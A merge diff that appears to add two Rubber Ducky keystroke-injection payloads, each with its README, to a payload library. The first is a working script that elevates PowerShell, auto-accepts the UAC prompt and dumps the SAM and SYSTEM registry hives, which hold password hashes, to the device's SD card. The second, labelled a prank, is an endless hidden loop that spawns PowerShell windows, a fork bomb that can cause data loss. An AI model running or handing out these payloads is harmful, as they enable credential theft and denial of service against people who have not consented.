Merge 47fa68ecd9 into 6ae414c545

Exfiltrate NTLM hash files onto Rubber Ducky's SD card

payloads/library/exfiltration/NTLM_ducky/README.md

@@ -0,0 +1,29 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
+
+## Description
+
+This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
+
+
+### Settings
+
+- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
+- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
+
+## Credits
+
+<h2 align="center"> Luu176 </h2>
+<div align="center">
+  <table>
+    <tr>
+      <td align="center" width="96">
+        <a href="https://github.com/luu176">
+          <img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
+        </a>
+        <br>GitHub
+      </td>
+    </tr>
+  </table>
+</div>

payloads/library/exfiltration/NTLM_ducky/payload.txt

@@ -0,0 +1,81 @@
+REM_BLOCK
+TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage
+AUTHOR          Luu176
+DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 
+                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 
+                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 
+                the defined storage drive on the Ducky device.
+END_REM
+
+DEFINE #driveLabel DUCKY
+REM below you can set the number of blinks for the caps lock when finished (default 9)
+DEFINE #numBlinks 9
+
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+SAVE_HOST_KEYBOARD_LOCK_STATE
+IF ($_CAPSLOCK_ON == TRUE)
+    CAPSLOCK
+END_IF
+GUI d
+DELAY 1000
+GUI r
+DELAY 500
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 800
+ALT y
+DELAY 800
+STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
+GUI d
+WAIT_FOR_CAPS_ON 
+REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
+VAR $i = 0
+WHILE ( $i < #numBlinks )
+    DELAY 150
+    CAPSLOCK
+    $i = ( $i + 1 )
+END_WHILE
+RESTORE_HOST_KEYBOARD_LOCK_STATE

payloads/library/prank/Windows-Spam-Terminals/README.md

@@ -0,0 +1,23 @@
+# Windows Spam Terminals
+
+This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
+
+Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
+
+### Details
+
+- **Title**: Windows Spam Terminals
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Prank
+- **Target**: Windows
+
+### Dependencies
+
+This payload is plug and play <3
+
+## How It Works 📜
+
+1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
+2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
+

payloads/library/prank/Windows-Spam-Terminals/payload.txt

@@ -0,0 +1,58 @@
+REM_BLOCK
+############################################
+#                                          #
+# Title        : Windows Spam Terminals    #
+# Author       : bst04 - Aleff             #
+# Version      : 1.0                       #
+# Category     : Prank                     #
+# Target       : Windows                   #
+#                                          #
+############################################
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r 
+DELAY 500
+STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"